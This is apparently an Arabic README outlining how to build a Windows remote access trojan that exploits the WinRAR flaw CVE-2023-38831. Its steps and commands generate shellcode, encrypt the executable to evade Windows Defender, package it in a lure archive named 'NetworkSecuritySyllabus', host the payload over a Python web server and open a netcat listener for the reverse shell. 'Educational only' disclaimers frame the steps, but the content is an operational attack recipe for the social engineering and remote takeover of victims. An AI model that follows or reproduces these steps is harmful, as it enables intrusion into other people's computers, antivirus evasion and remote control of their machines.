
حصان طروادة للوصول عن بُعد (RAT) لنظام Windows x64 باستخدام مزيج من الثغرة CVE-2023-38831 (ثغرة WinRAR < 6.23) وتقنية استغلال Shellcode.
تطوير حصان طروادة للوصول عن بُعد لنظام Windows x64 باستخدام CVE-2023-38831 (WinRAR < 6.23) واستغلال شيلكود لتجاوز Windows Defender.
تحذير: هذه المعلومات مخصصة للأغراض التعليمية فقط. الاستخدام غير المصرح به لهذه التقنيات غير قانوني وغير أخلاقي.
51721.py لإنشاء الشيلكود الأولي.تعديل الشيلكود وترجمته
تشفير الملف التنفيذي
decrypt_file.ps1 لتشفير الملف التنفيذي المُجمّع:
.\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
إنشاء أرشيف WinRAR
cve-2023-38831-exp-gen.py لإنشاء الأرشيف:
python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
إعداد خادم Python لتنزيل الملفات
enc_main.exe و decrypt_file.ps1.python3 -m http.server 8000
الاستعداد للاستماع لشل TCP العكسي
nc -lnvp 4444
تشغيل شل TCP العكسي
يتم تقديم هذه المعلومات للأغراض التعليمية فقط. استخدام هذا الاستغلال دون إذن صريح غير قانوني وغير أخلاقي. لا يتحمل المؤلف أي مسؤولية عن أي سوء استخدام لهذه المعلومات.